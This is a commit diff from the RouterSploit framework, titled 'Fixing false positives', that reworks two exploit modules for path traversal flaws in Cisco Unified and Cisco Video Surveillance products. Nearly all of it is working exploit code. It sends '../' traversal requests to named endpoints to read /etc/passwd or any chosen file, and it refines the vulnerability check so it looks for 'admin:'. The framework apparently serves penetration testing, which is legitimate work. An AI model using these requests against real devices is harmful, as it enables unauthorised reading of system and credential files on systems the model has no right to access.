Fixing false positives.

routersploit/modules/exploits/cisco/unified_multi_path_traversal.py

@@ -44,17 +44,20 @@ class Exploit(exploits.Exploit):
     filename = exploits.Option('/etc/passwd', 'File to read from the filesystem')
 
     def run(self):
-        url = "{}:{}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../..{}".format(self.target, self.port, self.filename)
+        if self.check():
+            url = "{}:{}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../..{}".format(self.target, self.port, self.filename)
 
-        response = http_request(method="GET", url=url)
-        if response is None:
-            return
+            response = http_request(method="GET", url=url)
+            if response is None:
+                return
 
-        if response.status_code == 200 and len(response.text):
-            print_success("Exploit success - reading file {}".format(self.filename))
-            print_info(response.text)
+            if response.status_code == 200 and len(response.text):
+                print_success("Exploit success - reading file {}".format(self.filename))
+                print_info(response.text)
+            else:
+                print_error("Exploit failed - could not read file")
         else:
-            print_error("Exploit failed - could not read file")
+            print_error("Exploit failed - target seems to be not vulnerable")
 
     @mute
     def check(self):
@@ -64,7 +67,7 @@ class Exploit(exploits.Exploit):
         if response is None:
             return False  # target is not vulnerable
 
-        if response.status_code == 200 and len(response.text):
+        if response.status_code == 200 and "admin:" in response.text:
             return True  # target is vulnerable
 
         return False  # target is not vulnerable

routersploit/modules/exploits/cisco/video_surv_path_traversal.py

@@ -36,19 +36,22 @@ class Exploit(exploits.Exploit):
     filename = exploits.Option('/etc/passwd', 'File to read from the filesystem')
 
     def run(self):
-        url = "{}:{}/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../..{}".format(self.target, self.port, self.filename)
+        if self.check():
+            url = "{}:{}/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../..{}".format(self.target, self.port, self.filename)
 
-        response = http_request(method="GET", url=url)
-        if response is None:
-            return
+            response = http_request(method="GET", url=url)
+            if response is None:
+                return
 
-        if response.status_code == 200 and len(response.text):
-            print_success("Exploit success")
-            print_status("Reading file: {}".format(self.filename))
-            print_info(response.text)
+            if response.status_code == 200 and len(response.text):
+                print_success("Exploit success")
+                print_status("Reading file: {}".format(self.filename))
+                print_info(response.text)
+            else:
+                print_error("Exploit failed - could not read file")
         else:
-            print_error("Exploit failed - could not read file")
-       
+            print_error("Exploit failed - device seems to be not vulnerable")
+
     @mute
     def check(self):
         url = "{}:{}/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwd".format(self.target, self.port)
@@ -57,7 +60,7 @@ class Exploit(exploits.Exploit):
         if response is None:
             return False  # target is not vulnerable
 
-        if response.status_code == 200 and len(response.text):
+        if response.status_code == 200 and "admin:" in response.text:
             return True  # target is vulnerable
 
         return False  # target is not vulnerable